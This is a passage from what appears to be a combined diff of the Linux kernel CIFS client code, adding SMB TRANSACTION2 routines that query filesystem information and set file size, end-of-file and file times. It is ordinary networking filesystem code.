++	pSMB->InformationLevel = cpu_to_le16(SMB_INFO_ALLOCATION);
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++		(struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in OldQFSInfo = %d\n", rc);
++	} else {                /* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc || get_bcc(&pSMBr->hdr) < 18)
++			rc = -EIO;      /* bad smb */
++		else {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++			cifs_dbg(FYI, "qfsinf resp BCC: %d  Offset %d\n",
++				 get_bcc(&pSMBr->hdr), data_offset);
++
++			response_data = (FILE_SYSTEM_ALLOC_INFO *)
++				(((char *) &pSMBr->hdr.Protocol) + data_offset);
++			FSData->f_bsize =
++				le16_to_cpu(response_data->BytesPerSector) *
++				le32_to_cpu(response_data->SectorsPerAllocationUnit);
++			/*
++			 * Much prefer larger sizes, but if the server does not
++			 * report a valid size then 4K is a reasonable minimum.
++			 */
++			if (FSData->f_bsize < 512)
++				FSData->f_bsize = 4096;
++
++			FSData->f_blocks =
++			       le32_to_cpu(response_data->TotalAllocationUnits);
++			FSData->f_bfree = FSData->f_bavail =
++				le32_to_cpu(response_data->FreeAllocationUnits);
++			cifs_dbg(FYI, "Blocks: %lld  Free: %lld Block size %ld\n",
++				 (unsigned long long)FSData->f_blocks,
++				 (unsigned long long)FSData->f_bfree,
++				 FSData->f_bsize);
++		}
++	}
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto oldQFSInfoRetry;
++
++	return rc;
++}
++
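++/*
++ * Modern variant of the level 0x01 call above: level 0x103
++ * (SMB_QUERY_FS_SIZE_INFO) reports the allocation unit counts as 64-bit
++ * values rather than 32-bit ones.
++ */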
++int
++CIFSSMBQFSInfo(const unsigned int xid, struct cifs_tcon *tcon,
++	       struct kstatfs *FSData)
++{
++/* level 0x103 SMB_QUERY_FILE_SYSTEM_INFO */
++	TRANSACTION2_QFSI_REQ *pSMB = NULL;
++	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
++	FILE_SYSTEM_INFO *response_data;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, byte_count;
++
++	cifs_dbg(FYI, "In QFSInfo\n");
++QFSInfoRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	params = 2;	/* level */
++	pSMB->TotalDataCount = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(
++		struct smb_com_transaction2_qfsi_req, InformationLevel) - 4);
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FS_SIZE_INFO);
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in QFSInfo = %d\n", rc);
++	} else {		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc || get_bcc(&pSMBr->hdr) < 24)
++			rc = -EIO;	/* bad smb */
++		else {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++
++			response_data = (FILE_SYSTEM_INFO *)
++				(((char *) &pSMBr->hdr.Protocol) + data_offset);
++			FSData->f_bsize =
++				le32_to_cpu(response_data->BytesPerSector) *
++				le32_to_cpu(response_data->SectorsPerAllocationUnit);
++			/*
++			 * Much prefer larger sizes, but if the server does not
++			 * report a valid size then 4K is a reasonable minimum.
++			 */
++			if (FSData->f_bsize < 512)
++				FSData->f_bsize = 4096;
++
++			FSData->f_blocks =
++			    le64_to_cpu(response_data->TotalAllocationUnits);
++			FSData->f_bfree = FSData->f_bavail =
++			    le64_to_cpu(response_data->FreeAllocationUnits);
++			cifs_dbg(FYI, "Blocks: %lld  Free: %lld Block size %ld\n",
++				 (unsigned long long)FSData->f_blocks,
++				 (unsigned long long)FSData->f_bfree,
++				 FSData->f_bsize);
++		}
++	}
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto QFSInfoRetry;
++
++	return rc;
++}
++
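++/*
++ * Query file system attribute info (level 0x105) and cache the response
++ * in tcon->fsAttrInfo for later use.
++ */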
++int
++CIFSSMBQFSAttributeInfo(const unsigned int xid, struct cifs_tcon *tcon)
++{
++/* level 0x105  SMB_QUERY_FILE_SYSTEM_INFO */
++	TRANSACTION2_QFSI_REQ *pSMB = NULL;
++	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
++	FILE_SYSTEM_ATTRIBUTE_INFO *response_data;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, byte_count;
++
++	cifs_dbg(FYI, "In QFSAttributeInfo\n");
++QFSAttributeRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	params = 2;	/* level */
++	pSMB->TotalDataCount = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find exact max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(
++		struct smb_com_transaction2_qfsi_req, InformationLevel) - 4);
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FS_ATTRIBUTE_INFO);
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(VFS, "Send error in QFSAttributeInfo = %d\n", rc);
++	} else {		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc || get_bcc(&pSMBr->hdr) < 13) {
++			/* BB also check if enough bytes returned */
++			rc = -EIO;	/* bad smb */
++		} else {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++			response_data = (FILE_SYSTEM_ATTRIBUTE_INFO *)
++				(((char *) &pSMBr->hdr.Protocol) + data_offset);
++			memcpy(&tcon->fsAttrInfo, response_data,
++			       sizeof(FILE_SYSTEM_ATTRIBUTE_INFO));
++		}
++	}
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto QFSAttributeRetry;
++
++	return rc;
++}
++
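++/*
++ * Query file system device info (level 0x104) and cache the response in
++ * tcon->fsDevInfo.
++ */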
++int
++CIFSSMBQFSDeviceInfo(const unsigned int xid, struct cifs_tcon *tcon)
++{
++/* level 0x104 SMB_QUERY_FILE_SYSTEM_INFO */
++	TRANSACTION2_QFSI_REQ *pSMB = NULL;
++	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
++	FILE_SYSTEM_DEVICE_INFO *response_data;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, byte_count;
++
++	cifs_dbg(FYI, "In QFSDeviceInfo\n");
++QFSDeviceRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	params = 2;	/* level */
++	pSMB->TotalDataCount = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find exact max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(
++		struct smb_com_transaction2_qfsi_req, InformationLevel) - 4);
++
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FS_DEVICE_INFO);
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in QFSDeviceInfo = %d\n", rc);
++	} else {		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc || get_bcc(&pSMBr->hdr) <
++			  sizeof(FILE_SYSTEM_DEVICE_INFO))
++			rc = -EIO;	/* bad smb */
++		else {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++			response_data =
++			    (FILE_SYSTEM_DEVICE_INFO *)
++				(((char *) &pSMBr->hdr.Protocol) +
++				 data_offset);
++			memcpy(&tcon->fsDevInfo, response_data,
++			       sizeof(FILE_SYSTEM_DEVICE_INFO));
++		}
++	}
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto QFSDeviceRetry;
++
++	return rc;
++}
++
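++/*
++ * Query the CIFS Unix extensions info (level 0x200) and cache it in
++ * tcon->fsUnixInfo. Like CIFSGetDFSRefer() above, this uses
++ * smb_init_no_reconnect(), presumably because it too can be reached from
++ * the reconnect path.
++ */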
++int
++CIFSSMBQFSUnixInfo(const unsigned int xid, struct cifs_tcon *tcon)
++{
++/* level 0x200  SMB_QUERY_CIFS_UNIX_INFO */
++	TRANSACTION2_QFSI_REQ *pSMB = NULL;
++	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
++	FILE_SYSTEM_UNIX_INFO *response_data;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, byte_count;
++
++	cifs_dbg(FYI, "In QFSUnixInfo\n");
++QFSUnixRetry:
++	rc = smb_init_no_reconnect(SMB_COM_TRANSACTION2, 15, tcon,
++				   (void **) &pSMB, (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	params = 2;	/* level */
++	pSMB->TotalDataCount = 0;
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find exact max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(100);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	byte_count = params + 1 /* pad */ ;
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(struct
++			smb_com_transaction2_qfsi_req, InformationLevel) - 4);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_CIFS_UNIX_INFO);
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(VFS, "Send error in QFSUnixInfo = %d\n", rc);
++	} else {		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc || get_bcc(&pSMBr->hdr) < 13) {
++			rc = -EIO;	/* bad smb */
++		} else {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++			response_data = (FILE_SYSTEM_UNIX_INFO *)
++				(((char *) &pSMBr->hdr.Protocol) + data_offset);
++			memcpy(&tcon->fsUnixInfo, response_data,
++			       sizeof(FILE_SYSTEM_UNIX_INFO));
++		}
++	}
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto QFSUnixRetry;
++
++	return rc;
++}
++
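++/*
++ * Advertise the client's CIFS Unix extensions capabilities (level 0x200
++ * SMB_SET_CIFS_UNIX_INFO) to the server via TRANS2_SET_FS_INFORMATION.
++ */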
++int
++CIFSSMBSetFSUnixInfo(const unsigned int xid, struct cifs_tcon *tcon, __u64 cap)
++{
++/* level 0x200  SMB_SET_CIFS_UNIX_INFO */
++	TRANSACTION2_SETFSI_REQ *pSMB = NULL;
++	TRANSACTION2_SETFSI_RSP *pSMBr = NULL;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, param_offset, offset, byte_count;
++
++	cifs_dbg(FYI, "In SETFSUnixInfo\n");
++SETFSUnixRetry:
++	/* BB switch to small buf init to save memory */
++	rc = smb_init_no_reconnect(SMB_COM_TRANSACTION2, 15, tcon,
++					(void **) &pSMB, (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	params = 4;	/* 2 bytes zero followed by info level. */
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_setfsi_req, FileNum)
++				- 4;
++	offset = param_offset + params;
++
++	pSMB->MaxParameterCount = cpu_to_le16(4);
++	/* BB find exact max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(100);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FS_INFORMATION);
++	byte_count = 1 /* pad */ + params + 12;
++
++	pSMB->DataCount = cpu_to_le16(12);
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++
++	/* Params. */
++	pSMB->FileNum = 0;
++	pSMB->InformationLevel = cpu_to_le16(SMB_SET_CIFS_UNIX_INFO);
++
++	/* Data. */
++	pSMB->ClientUnixMajor = cpu_to_le16(CIFS_UNIX_MAJOR_VERSION);
++	pSMB->ClientUnixMinor = cpu_to_le16(CIFS_UNIX_MINOR_VERSION);
++	pSMB->ClientUnixCap = cpu_to_le64(cap);
++
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(VFS, "Send error in SETFSUnixInfo = %d\n", rc);
++	} else {		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++		if (rc)
++			rc = -EIO;	/* bad smb */
++	}
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto SETFSUnixRetry;
++
++	return rc;
++}
++
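++/*
++ * Query POSIX file system info (level 0x201) into struct kstatfs. File
++ * node counts are filled in only when the server reports them; a value of
++ * -1 on the wire means "not provided".
++ */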
++int
++CIFSSMBQFSPosixInfo(const unsigned int xid, struct cifs_tcon *tcon,
++		   struct kstatfs *FSData)
++{
++/* level 0x201  SMB_QUERY_CIFS_POSIX_INFO */
++	TRANSACTION2_QFSI_REQ *pSMB = NULL;
++	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
++	FILE_SYSTEM_POSIX_INFO *response_data;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, byte_count;
++
++	cifs_dbg(FYI, "In QFSPosixInfo\n");
++QFSPosixRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	params = 2;	/* level */
++	pSMB->TotalDataCount = 0;
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find exact max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(100);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	byte_count = params + 1 /* pad */ ;
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(struct
++			smb_com_transaction2_qfsi_req, InformationLevel) - 4);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_POSIX_FS_INFO);
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in QFSPosixInfo = %d\n", rc);
++	} else {		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc || get_bcc(&pSMBr->hdr) < 13) {
++			rc = -EIO;	/* bad smb */
++		} else {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++			response_data = (FILE_SYSTEM_POSIX_INFO *)
++				(((char *) &pSMBr->hdr.Protocol) + data_offset);
++			FSData->f_bsize =
++					le32_to_cpu(response_data->BlockSize);
++			/*
++			 * Much prefer larger sizes, but if the server does not
++			 * report a valid size then 4K is a reasonable minimum.
++			 */
++			if (FSData->f_bsize < 512)
++				FSData->f_bsize = 4096;
++
++			FSData->f_blocks =
++					le64_to_cpu(response_data->TotalBlocks);
++			FSData->f_bfree =
++			    le64_to_cpu(response_data->BlocksAvail);
++			if (response_data->UserBlocksAvail == cpu_to_le64(-1)) {
++				FSData->f_bavail = FSData->f_bfree;
++			} else {
++				FSData->f_bavail =
++				    le64_to_cpu(response_data->UserBlocksAvail);
++			}
++			if (response_data->TotalFileNodes != cpu_to_le64(-1))
++				FSData->f_files =
++				     le64_to_cpu(response_data->TotalFileNodes);
++			if (response_data->FreeFileNodes != cpu_to_le64(-1))
++				FSData->f_ffree =
++				      le64_to_cpu(response_data->FreeFileNodes);
++		}
++	}
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto QFSPosixRetry;
++
++	return rc;
++}
++
++/*
++ * We cannot use the write-of-zero-bytes trick to set the file size, due to
++ * the need for large file support. Also note that this path-based
++ * SetPathInfo is preferred to the SetFileInfo-based method in the next
++ * routine, which is only needed to work around a sharing violation bug in
++ * Samba that this routine can run into.
++ */
++int
++CIFSSMBSetEOF(const unsigned int xid, struct cifs_tcon *tcon,
++	      const char *file_name, __u64 size, struct cifs_sb_info *cifs_sb,
++	      bool set_allocation)
++{
++	struct smb_com_transaction2_spi_req *pSMB = NULL;
++	struct smb_com_transaction2_spi_rsp *pSMBr = NULL;
++	struct file_end_of_file_info *parm_data;
++	int name_len;
++	int rc = 0;
++	int bytes_returned = 0;
++	int remap = cifs_remap(cifs_sb);
++
++	__u16 params, byte_count, data_count, param_offset, offset;
++
++	cifs_dbg(FYI, "In SetEOF\n");
++SetEOFRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->FileName, file_name,
++				       PATH_MAX, cifs_sb->local_nls, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, file_name);
++	}
++	params = 6 + name_len;
++	data_count = sizeof(struct file_end_of_file_info);
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	pSMB->MaxDataCount = cpu_to_le16(4100);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_spi_req,
++				InformationLevel) - 4;
++	offset = param_offset + params;
++	if (set_allocation) {
++		if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
++			pSMB->InformationLevel =
++				cpu_to_le16(SMB_SET_FILE_ALLOCATION_INFO2);
++		else
++			pSMB->InformationLevel =
++				cpu_to_le16(SMB_SET_FILE_ALLOCATION_INFO);
++	} else /* Set File Size */ {
++		if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
++			pSMB->InformationLevel =
++				cpu_to_le16(SMB_SET_FILE_END_OF_FILE_INFO2);
++		else
++			pSMB->InformationLevel =
++				cpu_to_le16(SMB_SET_FILE_END_OF_FILE_INFO);
++	}
++
++	parm_data =
++	    (struct file_end_of_file_info *) (((char *) &pSMB->hdr.Protocol) +
++				       offset);
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
++	byte_count = 3 /* pad */  + params + data_count;
++	pSMB->DataCount = cpu_to_le16(data_count);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	parm_data->FileSize = cpu_to_le64(size);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc)
++		cifs_dbg(FYI, "SetPathInfo (file size) returned %d\n", rc);
++
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto SetEOFRetry;
++
++	return rc;
++}
++
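++/*
++ * Handle-based variant of CIFSSMBSetEOF() above; see the comment there
++ * for why the path-based call is preferred when possible.
++ */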
++int
++CIFSSMBSetFileSize(const unsigned int xid, struct cifs_tcon *tcon,
++		   struct cifsFileInfo *cfile, __u64 size, bool set_allocation)
++{
++	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
++	struct file_end_of_file_info *parm_data;
++	int rc = 0;
++	__u16 params, param_offset, offset, byte_count, count;
++
++	cifs_dbg(FYI, "SetFileSize (via SetFileInfo) %lld\n",
++		 (long long)size);
++	rc = small_smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB);
++
++	if (rc)
++		return rc;
++
++	pSMB->hdr.Pid = cpu_to_le16((__u16)cfile->pid);
++	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(cfile->pid >> 16));
++
++	params = 6;
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
++	offset = param_offset + params;
++
++	count = sizeof(struct file_end_of_file_info);
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find exact max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
++	byte_count = 3 /* pad */  + params + count;
++	pSMB->DataCount = cpu_to_le16(count);
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	/* SMB offsets are from the start of the SMB header, 4 bytes past the RFC1001 length field */
++	parm_data =
++		(struct file_end_of_file_info *)(((char *)pSMB) + offset + 4);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	parm_data->FileSize = cpu_to_le64(size);
++	pSMB->Fid = cfile->fid.netfid;
++	if (set_allocation) {
++		if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
++			pSMB->InformationLevel =
++				cpu_to_le16(SMB_SET_FILE_ALLOCATION_INFO2);
++		else
++			pSMB->InformationLevel =
++				cpu_to_le16(SMB_SET_FILE_ALLOCATION_INFO);
++	} else /* Set File Size */ {
++		if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
++			pSMB->InformationLevel =
++				cpu_to_le16(SMB_SET_FILE_END_OF_FILE_INFO2);
++		else
++			pSMB->InformationLevel =
++				cpu_to_le16(SMB_SET_FILE_END_OF_FILE_INFO);
++	}
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
++	cifs_small_buf_release(pSMB);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in SetFileInfo (SetFileSize) = %d\n",
++			 rc);
++	}
++
++	/*
++	 * Note: on an -EAGAIN error only the caller can retry handle-based
++	 * calls, since the file handle passed in is no longer valid.
++	 */
++
++	return rc;
++}
++
++/*
++ * Some legacy servers such as NT4 require that the file times be set on an
++ * open handle, rather than by pathname - this is awkward due to potential
++ * access conflicts on the open, but it is unavoidable for these old
++ * servers, since the only other choice is to go from 100 nanosecond DCE
++ * time and resort to the original setpathinfo level, which takes the
++ * ancient DOS time format with 2 second granularity.
++ */
++int
++CIFSSMBSetFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
++		    const FILE_BASIC_INFO *data, __u16 fid, __u32 pid_of_opener)
++{
++	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
++	char *data_offset;
++	int rc = 0;
++	__u16 params, param_offset, offset, byte_count, count;
++
++	cifs_dbg(FYI, "Set Times (via SetFileInfo)\n");
++	rc = small_smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB);
++
++	if (rc)
++		return rc;
++
++	pSMB->hdr.Pid = cpu_to_le16((__u16)pid_of_opener);
++	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid_of_opener >> 16));
++
++	params = 6;
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
++	offset = param_offset + params;
++
++	data_offset = (char *)pSMB +
++			offsetof(struct smb_hdr, Protocol) + offset;
++
++	count = sizeof(FILE_BASIC_INFO);
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find max SMB PDU from sess */
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
++	byte_count = 3 /* pad */  + params + count;
++	pSMB->DataCount = cpu_to_le16(count);
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->Fid = fid;
++	if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
++		pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_BASIC_INFO2);
++	else
++		pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_BASIC_INFO);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	memcpy(data_offset, data, sizeof(FILE_BASIC_INFO));
++	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
++	cifs_small_buf_release(pSMB);
++	if (rc)
++		cifs_dbg(FYI, "Send error in Set Time (SetFileInfo) = %d\n",
++			 rc);
++
++	/*
++	 * Note: on an -EAGAIN error only the caller can retry handle-based
